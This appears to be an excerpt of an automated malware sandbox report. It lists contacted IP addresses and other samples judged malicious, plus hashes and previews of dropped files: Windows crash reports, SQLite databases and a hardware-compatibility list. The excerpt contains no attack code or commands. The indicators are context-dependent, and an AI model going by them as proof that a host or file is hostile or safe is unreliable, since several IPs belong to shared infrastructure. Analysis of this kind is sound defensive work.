                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          CLOUDFLARENETUSiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          TUT-ASUSiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          CLOUDFLARENETUSiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eiTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Windows\System32\e_sqlite3.dlle0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                              Entropy (8bit):0.8220110668371315
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:B4nFIUuR9LpizyKy6Ksj44RvbCu/6tQXIDcQJc6Qk00cEncw3eXaXz+HbHgSQgJM:Buaizy6Km033tgjtQzuiFnZ24lO8ZT
                                                                                                                                                                                              MD5:BEB6F6733485526AF0C4FDE97F53027A
                                                                                                                                                                                              SHA1:DE17B60EAD9406558C983B65FB92368DA8D28FB3
                                                                                                                                                                                              SHA-256:6C036900F5914EB8E1D239BE69B7BA07D1FAEF0BC6E957BBB254343240454EE1
                                                                                                                                                                                              SHA-512:90314D72C66DEBA98AE865D426C25130442ADCEA1B68074911794ED7A4255BEF1A90944254509506E35AF209B78B2AA8185BF561F20ABEC491AA7B2D14642E95
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.3.0.3.3.6.1.3.3.7.8.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.3.0.3.3.6.5.4.0.0.3.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.a.6.b.1.c.6.-.f.4.c.d.-.4.e.5.5.-.8.5.1.8.-.3.9.6.b.b.c.a.0.3.4.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.5.e.9.2.a.d.-.2.e.4.7.-.4.8.f.3.-.b.8.b.0.-.b.b.6.a.e.d.d.8.8.2.0.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.m.P.8.r.z.G.D.7.f.G...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.0.-.0.0.0.1.-.0.0.1.4.-.d.f.e.2.-.e.1.8.c.7.d.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                              Entropy (8bit):0.821662101912063
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:pixF3F/pikyKy6Qsj44RvbCu/6tQXIDcQJc6Qk00cEncw3eXaXz+HbHgSQgJjfou:4Phiky6Qm033tgjtQzuiFnZ24lO8ZT
                                                                                                                                                                                              MD5:A4FB21D51FD7E26AD264368A5DD6DAFA
                                                                                                                                                                                              SHA1:FF10267978E7083840C7FC283F83C0CC7F8A6150
                                                                                                                                                                                              SHA-256:009C39FA6F897B5B15C46887F59EF765BE831B6D3C4498D5A8E34FB811A023AF
                                                                                                                                                                                              SHA-512:9B5BBE568E8E59A88167CB47B20B09A84BB1BE2A6146B39A5E4B0954F4EB8074516A6EE08C34D4469D61830D7D70F3A4E69F8FD1CE0C0E4B4C43FF6F66E3630D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.3.0.3.3.9.0.8.2.2.5.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.3.0.3.3.9.3.9.4.7.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.d.4.e.f.e.d.-.c.d.8.c.-.4.e.f.5.-.8.f.0.9.-.1.6.1.5.3.e.3.a.c.f.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.3.d.9.1.c.e.-.c.2.1.1.-.4.b.3.2.-.b.3.f.2.-.4.8.f.3.8.0.d.3.d.9.d.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.m.P.8.r.z.G.D.7.f.G...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.8.-.0.0.0.1.-.0.0.1.4.-.e.0.5.1.-.b.0.8.e.7.d.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Tue Jan 14 12:12:19 2025, 0x1205a4 type
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):58566
                                                                                                                                                                                              Entropy (8bit):1.6579100568851688
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:Co6slSlhsdXOMTvXg2sFwWQbKrCtkbyDCMo0:yssHsd+uvNsRQbiCtkby60
                                                                                                                                                                                              MD5:84693842D9D12F544404DC6F8F7E317D
                                                                                                                                                                                              SHA1:8A3EFA4E4419B8EFA797D56D11FEA9AD66B519C6
                                                                                                                                                                                              SHA-256:A3A5A973191E7380BAB1BB6F35503389CE8FC0E63BE7B12896B17451E4DDFE16
                                                                                                                                                                                              SHA-512:C3FBDC11F695D9E1D57E7410BEE267428762AE798185DE0400938ABAB08B36BCBC3519923A88F47C836ACA6F134A31B4AEB06995E368E4C2B8348537AF2D8352
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MDMP..a..... ........T.g........................................R-..........T.......8...........T...............&...........H...........4...............................................................................eJ..............Lw......................T............T.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):8582
                                                                                                                                                                                              Entropy (8bit):3.697861174336935
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:R6l7wVeJT9O6YGgPgmfBEmpra89b12oZwf0q32em:R6lXJpO6YpPgmfBEgr+fU
                                                                                                                                                                                              MD5:2CB5628E883045D928190F0C8E091E5C
                                                                                                                                                                                              SHA1:A1EDF6F5662205C53665F2C5F83764009E5ECD8D
                                                                                                                                                                                              SHA-256:2F5ED8641D44094C22DDD3B2FE141D405704E00EDC8674063638B3903A96FA43
                                                                                                                                                                                              SHA-512:FE90DABB4B80A5476FB0B008FC6FB6D731A75BCB47C7AF0C7F14D411CF60578B2EBB454FD8161DED98D28306944330A8B7AB3398E1F63210814F04D0064D850C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.3.2.<./.P.i.
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4872
                                                                                                                                                                                              Entropy (8bit):4.485307406082031
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsRJg771I9bYWpW8VYFYm8M4JCVC9/FOyq8vh956xptSTS2d:uIjfjI78R7VhJWWVupoO2d
                                                                                                                                                                                              MD5:8BABF9FD42E0215C2429C18247F99435
                                                                                                                                                                                              SHA1:65720F1FE3B0AB7389EC5082804BC389B2782B21
                                                                                                                                                                                              SHA-256:D52FB72EF2DBF30B62B800D028934B3E56300D4364DD5BF805693E72DEEBD4FE
                                                                                                                                                                                              SHA-512:FBBDDCFB376A26AD6D3A0FD15D2E760BB742BEA601137A10AA2D9519565E0D71B363C50D561D0C9C0C1A17BA608F6146340AADCB6AE789AD3AC4C327A13B9B80
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675555" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Tue Jan 14 12:12:16 2025, 0x1205a4 type
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):58006
                                                                                                                                                                                              Entropy (8bit):1.6721135819653405
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:NoDslSlh68XOMT37e6/64nr6C5w7Z+y0TteYB3r4s3eO:gssHv+u37e6/64nrYZ+y0TUY9T
                                                                                                                                                                                              MD5:F61F4893252A1A5EC6957516B5820640
                                                                                                                                                                                              SHA1:4B9837F7236FADEB938E378D4BF030CC6DA05996
                                                                                                                                                                                              SHA-256:BC9BF8D70EF5726350CC0C3F9320387938F6070EFB695DFB9C55A92042088816
                                                                                                                                                                                              SHA-512:8681178A55480864BFFF91EE04BEB412EF772D565C3B40FCB7162084BE6D67A28FBBACFDCD1C8985A7CCCBF708298D0A5408EA260F3F8FC20587B25C883B554D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MDMP..a..... ........T.g........................................R-..........T.......8...........T...........................H...........4...............................................................................eJ..............Lw......................T............T.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):8598
                                                                                                                                                                                              Entropy (8bit):3.6999810252949166
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:R6l7wVeJLTk46YdDcc6LgmfBEmprO89b12PbwfW32fm:R6lXJvk46YpmgmfBE0Msfc
                                                                                                                                                                                              MD5:739E4DE513702F22C93C6748AD3C3DFB
                                                                                                                                                                                              SHA1:8A87E4E5F3CE4B55E4BA85C6ED9C9D13CFBB486A
                                                                                                                                                                                              SHA-256:7306A71FB7079D1AF4A028C96547E0458B49BAECB6A9C562CA3FAB19C3AE41F1
                                                                                                                                                                                              SHA-512:1C5F05847CBC27A9A74571821B2C96ED62CD625F6528122F5857541FA2825366E5077D1E82552E3FD62607FAECF35C8CE0A22267DC5422217EE1994BB8678BB3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.6.<./.P.i.
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4872
                                                                                                                                                                                              Entropy (8bit):4.483239666834873
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs6Jg771I9bYWpW8VY4Ym8M4JCVC9/F4yq8vh9XpptSTSwd:uIjfII78R7VEJwW7ppoOwd
                                                                                                                                                                                              MD5:A1D106DB019E220B2C7C0EA2D80F7798
                                                                                                                                                                                              SHA1:85E68AACBABD2A86247E64E3BA711C35B3BEED10
                                                                                                                                                                                              SHA-256:43435B33A7514AF48A42C1BFDB42DEC4CB8A87F4F50E8E013A59BEB1335D78C2
                                                                                                                                                                                              SHA-512:BC548B136E3CFF8ABB93E8A2A0DA0711A00EEBA38A7EDEDA363D167342A2D9F8AA62A37750703788D8958416CF7E5E6A1B62A10D8958EE02C3C1BB180F0E5457
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675554" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):751624
                                                                                                                                                                                              Entropy (8bit):4.941596949315087
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                              MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                              SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                              SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                              SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
